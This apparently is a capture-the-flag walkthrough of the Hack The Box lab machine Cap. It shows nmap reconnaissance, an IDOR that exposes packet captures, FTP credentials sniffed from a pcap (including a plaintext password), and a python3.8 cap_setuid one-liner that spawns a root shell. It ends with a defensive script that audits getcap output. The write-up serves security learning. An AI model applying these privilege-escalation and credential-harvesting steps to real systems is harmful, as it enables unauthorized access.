Hack The Box Walkthrough: Cap (10.10.10.245)



This content originally appeared on DEV Community and was authored by tamilvanan

Note: I’m not an expert. I’m writing this blog just to document my learning journey. 🚀

Overview

Difficulty: Easy

Goal: Capture user.txt and root.txt flags

Focus Areas: PCAP analysis, FTP credential sniffing, capability-based privilege escalation

1. Reconnaissance

Nmap Scan

nmap -A 10.10.10.245 -oN cap.nmap

Findings:

  • Port 21 (FTP): Open
  • Port 22 (SSH): Open
  • Port 80 (HTTP): Web server with a scan tool

2. Web Enumeration

Visit http://10.10.10.245 in your browser.

Observe Functionality

  • You can run a “Security Snapshot” which redirects to /data/[scan_id]
  • Example path: /data/0

Try Other Scan IDs

  • Visit /data/1, /data/2, etc.
  • Observation: Changing the ID in the URL lets you access other users’ scans (an insecure direct object reference, IDOR).

3. Analyze PCAP File

From one of the /data/[id] paths (likely /data/0), download a .pcap file.

  • Save it as 1.pcap

Open in Wireshark

wireshark 1.pcap

Apply Filter

Use Wireshark filter:

ftp

Find Credentials

Look for:

USER nathan
PASS [password]

Right-click and follow the TCP stream to view the full conversation.

4. SSH Access as Nathan

Use the FTP password to try SSH:

ssh nathan@10.10.10.245

Use the discovered password: cap@123

Get User Flag

cat ~/user.txt

✅ User flag captured

5. Privilege Escalation

Check for SUID/Capabilities

getcap -r / 2>/dev/null

What Does getcap Mean?

The getcap command lists Linux file capabilities, which are fine-grained permissions that can be assigned to executables.

getcap -r / 2>/dev/null

  • -r /: Recursively check every file starting from root (/)
  • 2>/dev/null: Hides “Permission denied” errors to keep output clean

You’re looking for binaries with powerful capabilities like cap_setuid, which lets a program change its user ID (e.g., become root). If a binary like python3.8 has this capability, it can be abused to spawn a root shell.

These capabilities are separate from traditional SUID bits and are often overlooked.

Output Example

/usr/bin/python3.8 = cap_setuid+ep

Explanation

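This means python3.8 has the capability to change its UID, so it can be used to become root. The +ep suffix means the capability is in the file's effective and permitted sets, so it is active as soon as the binary runs.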

Exploit It

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Now check:

whoami
# root

Get Root Flag

cat /root/root.txt

✅ Root flag captured

Summary

Step        | Description
------------|----------------------------------------------------------
Recon       | Nmap scan reveals FTP, SSH, HTTP
Web Enum    | Snapshot data exposed at /data/0
PCAP        | FTP creds leaked in packet capture
User Shell  | SSH access with FTP creds
Priv Esc    | Python binary with cap_setuid lets us become root

Flags

  • User Flag: Obtained from /home/nathan/user.txt
  • Root Flag: Obtained from /root/root.txt

Lessons Learned

  • PCAPs can leak sensitive data if not secured
  • FTP transmits credentials in plaintext
  • Linux capabilities can be as dangerous as SUID if misconfigured
  • Always restrict access to debug or internal diagnostic tools
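
To act on the capabilities lesson above, here is an added example (not part of the original post) that parses `getcap -r /` output in both the older `path = caps+ep` and the newer `path caps=ep` formats and flags high-risk capabilities that sit in a file's permitted set. The capability shortlist, the interpreter pattern and the sample lines are assumptions constructed for this example.

```python
import re

# High-risk shortlist is an assumption of this example, not an exhaustive list.
HIGH_RISK = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_module",
             "cap_sys_ptrace", "cap_dac_override", "cap_dac_read_search"}
# Interpreters and shells run user-supplied code with the file's capabilities.
INTERPRETER = re.compile(r"/(python|perl|ruby|php|node|lua|bash|sh)[\d.]*$")
# Older libcap prints "/path = caps+ep"; newer releases print "/path caps=ep".
LINE = re.compile(r"^(?P<path>/.+?)(?: =)? (?P<clauses>cap_\S*[=+]\S*.*)$")
CLAUSE = re.compile(r"^(?P<names>[a-z0-9_,]+)(?P<ops>(?:[=+-][eip]*)+)$")

def parse_getcap_line(line):
    """Return (path, {capability: granted flag letters}) or None if unparsable."""
    m = LINE.match(line.strip())
    if not m:
        return None
    caps = {}
    for clause in m.group("clauses").split():
        c = CLAUSE.match(clause)
        if not c:
            continue
        # Keep flags set with "=" or "+"; flags after "-" are removals.
        flags = "".join(re.findall(r"[=+]([eip]*)", c.group("ops")))
        for name in c.group("names").split(","):
            caps[name] = "".join(sorted(set(caps.get(name, "") + flags)))
    return m.group("path"), caps

def audit(getcap_output):
    """Flag high-risk capabilities that are in the file's permitted set."""
    findings = []
    for parsed in map(parse_getcap_line, getcap_output.splitlines()):
        if not parsed:
            continue
        path, caps = parsed
        for name, flags in sorted(caps.items()):
            if "p" in flags and name in HIGH_RISK:
                sev = "critical" if INTERPRETER.search(path) else "high"
                findings.append((sev, path, name, f"setcap -r {path}"))
    return findings

# Constructed sample output (both getcap formats), not taken from the target host.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/opt/tools/backup cap_dac_read_search=ep
/usr/bin/perl cap_setuid=i
"""

if __name__ == "__main__":
    print(*audit(SAMPLE), sep="\n")
```

The last field of each finding is the `setcap -r` command that removes the file's capabilities. The inheritable-only entry is not flagged because the capability is not in the permitted set.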

